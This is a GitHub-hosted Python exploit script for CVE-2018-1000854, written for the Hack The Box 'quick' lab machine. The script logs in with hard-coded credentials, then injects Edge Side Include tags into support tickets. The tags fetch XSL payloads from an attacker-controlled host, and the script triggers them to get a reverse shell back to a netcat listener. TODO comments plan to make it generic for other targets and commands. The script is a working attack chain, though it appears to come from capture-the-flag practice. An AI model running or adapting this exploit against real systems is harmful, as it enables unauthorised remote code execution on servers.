-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathCVE-2018-1000854_exploit.py
102 lines (91 loc) · 4.46 KB
/
CVE-2018-1000854_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#!/usr/bin/env python3
#coding: utf8
#Created by zweilosec (WolfZweiler) for CVE-2018-1000854 (as exposed in HTB - quick)
import requests
from bs4 import BeautifulSoup
import time
import sys
login_url = "http://quick.htb:9001/login.php"
login_data = '[email protected]&password=Quick4cc3$$'
login_headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Cookie': 'PHPSESSID=03u65s156tk17dfddsi28m7rld',
'Referer': 'http://quick.htb:9001/login.php',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'quick.htb:9001'}
#TODO: Get headers from an initial GET request so have accurate PHPSESSID (not hard-coded)
ticket_url = "http://quick.htb:9001/ticket.php"
ticket_headers = {
'Host': 'quick.htb:9001',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://quick.htb:9001/ticket.php',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'PHPSESSID=03u65s156tk17dfddsi28m7rld'}
esi1 = 'title=evil&msg="<esi:include src="http://10.10.15.10:1337/evil.xml" stylesheet="http://10.10.15.10:1337/evil.xsl"></esi:include>"&id=TKT-1234'
esi2 = 'title=evil1&msg="<esi:include src="http://10.10.15.10:1337/evil1.xml" stylesheet="http://10.10.15.10:1337/evil1.xsl"></esi:include>"&id=TKT-2345'
esi3 = 'title=evil2&msg="<esi:include src="http://10.10.15.10:1337/evil2.xml" stylesheet="http://10.10.15.10:1337/evil2.xsl"></esi:include>"&id=TKT-3456'
ticGet1_url = 'http://quick.htb:9001/search.php?search=1234'
ticGet2_url = 'http://quick.htb:9001/search.php?search=2345'
ticGet3_url = 'http://quick.htb:9001/search.php?search=3456'
ticGet_headers = {
'Host': 'quick.htb:9001',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://quick.htb:9001/home.php',
'X-Requested-With': 'XMLHttpRequest',
'Connection': 'close',
'Cookie': 'PHPSESSID=03u65s156tk17dfddsi28m7rld',
'DNT': '1'}
esi1_r, esi2_r, esi3_r = None, None, None
login_r = requests.post(login_url, headers = login_headers, data = login_data)
#login_r.status_code should be == 302, however this login request is not working correctly
#need to further troubleshoot; for now bypassed by logging in with burp
if login_r.status_code == 200:
print("Login successful!\n")
esi1_r = requests.post(ticket_url, headers = ticket_headers, data = esi1)
time.sleep(1)
ticGet1_r = requests.get(ticGet1_url, headers = ticGet_headers)
time.sleep(1)
else:
print("The request failed with status code: " + str(login_r.status_code))
print("Did not login successfully :(\n")
print("Dumping response text:\n\n")
print(login_r.text)
sys.exit()
if esi1_r.status_code == 200:
print("Evil1 upload successful!\n")
esi2_r = requests.post(ticket_url, headers = ticket_headers, data = esi2)
time.sleep(1)
ticGet2_r = requests.get(ticGet2_url, headers = ticGet_headers)
time.sleep(1)
else:
print("The request failed with status code: " + str(esi1_r.status_code))
print("Did not upload evil1 successfully :(\n")
sys.exit()
if esi2_r.status_code == 200:
print("Evil2 upload successful!\n")
esi3_r = requests.post(ticket_url, headers = ticket_headers, data = esi3)
time.sleep(1)
ticGet3_r = requests.get(ticGet3_url, headers = ticGet_headers)
else:
print("The request failed with status code: " + str(esi2_r.status_code))
print("Did not upload evil2 successfully :(\n")
sys.exit()
if esi3_r.status_code == 200:
print("Evil3 upload successful!\n")
print("Check your nc listener...shell should be inbound!\n")
else:
print("The request failed with status code: " + str(esi3_r.status_code))
print("Did not upload evil3 successfully :(\n")
#TODO: generalize urls and other data to be used other than in HTB; perhaps take as input arguments URL, PORT, USER, PASS, Commands to be run (foreach type loop)...
#TODO: exception handling
#TODO: instead of separate SimpleHTTPServer hosting different files, do in-script
#TODO: instead of nc listener in terminal, implement in-script